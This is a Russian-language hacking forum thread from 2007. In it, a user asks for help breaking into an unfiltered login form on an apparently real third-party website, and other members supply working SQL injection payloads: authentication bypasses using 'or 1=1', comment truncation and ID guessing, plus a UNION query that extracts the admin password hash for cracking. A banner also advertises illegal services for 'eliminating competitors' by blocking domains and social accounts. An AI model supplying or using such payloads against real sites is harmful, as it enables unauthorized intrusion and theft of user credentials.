Форум АНТИЧАТ - Sql запрос

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Sql запрос

Опции темы

Поиск в этой теме

Опции просмотра

Sql запрос

30.07.2007, 13:12

Marlboro_X

Познающий

Регистрация: 16.10.2006

Сообщений: 44

Провел на форуме:
189948

Репутация: 12

Отправить сообщение для Marlboro_X с помощью ICQ

Sql запрос

Есть сайт. Есть форма с логином и паролем без фильтрации на символы. Когда ввожу что то типа:
логин: rrr'
пасс: njhj

получаю ошибку

SELECT id FROM Users WHERE login = 'rrr'' AND password = MD5('njhj'); caused error:
Ошибка
Ошибка запроса к базе данных. Попробуйте попытку ещё раз.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'njhj')' at line 1

Направьте в нужное русло все что знал перепробовал. Помогите заюзать багу

30.07.2007, 13:13

Basurman

Постоянный

Регистрация: 10.11.2006

Сообщений: 416

Провел на форуме:
5636868

Репутация: 849

Отправить сообщение для Basurman с помощью ICQ

в поле логин or 1=1/*

можно добавить limit 0,1 - тогда скорее всего будет админ
А можно просто rrr/* - юзер будет rrr пароль любой

Имхо...

Последний раз редактировалось Basurman; 30.07.2007 в 13:20..

30.07.2007, 13:20

Marlboro_X

Познающий

Регистрация: 16.10.2006

Сообщений: 44

Провел на форуме:
189948

Репутация: 12

or 1=1/* пробовал!
Оно грубо говоря заходит, но без юзера. Пишет даже "Здравствуйте, " и все.

30.07.2007, 13:22

Basurman

Постоянный

Регистрация: 10.11.2006

Сообщений: 416

Провел на форуме:
5636868

Репутация: 849

пост выше. я дописал туда еще парочку способов - попробуй

30.07.2007, 16:09

everm1nd

Новичок

Регистрация: 20.01.2007

Сообщений: 25

Провел на форуме:
102126

Репутация: 8

Я бы попробовал:
SELECT id FROM Users WHERE login='admin'--
т.е. login:admin'--
или
SELECT id FROM Users WHERE login='' or id=1--
т.е. login:' or id=1--
Думаю у админа идентификатор единичка, так что прокатит, если что перебери другие.
А может исчо енто поможет:
SELECT id FROM Users WHERE login='' UNION SELECT password FROM Users WHERE id=1--
т.е. login:' UNION SELECT password FROM Users WHERE id=1--
Потом расшифруешь...
А при 1=1 пишет "Здраствуйте, " наверно потому, что идентификатор ноль стоит у гостя, и именно этот пользователь и является первым подходящим под запрос...

30.07.2007, 16:21

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

Провел на форуме:
9751379

Репутация: 3812

Отправить сообщение для +toxa+ с помощью ICQ

Отправить сообщение для +toxa+ с помощью AIM

Попробуй через подзапрос

Код:

blah' or login=(select login from users limit 0,1)/*

юзеров переключаем первым значением в лимите

__________________

30.07.2007, 16:28

Basurman

Постоянный

Регистрация: 10.11.2006

Сообщений: 416

Провел на форуме:
5636868

Репутация: 849

http://sevclick.com

оно там не пашет. двойная проверка? хз
имхо ' or 1=1 limit 0,1/* подрубится под амином

Последний раз редактировалось Basurman; 30.07.2007 в 16:31..

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection для чайников, взлом ASP+MSSQL	k00p3r	Чужие Статьи	0	12.06.2005 12:42
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход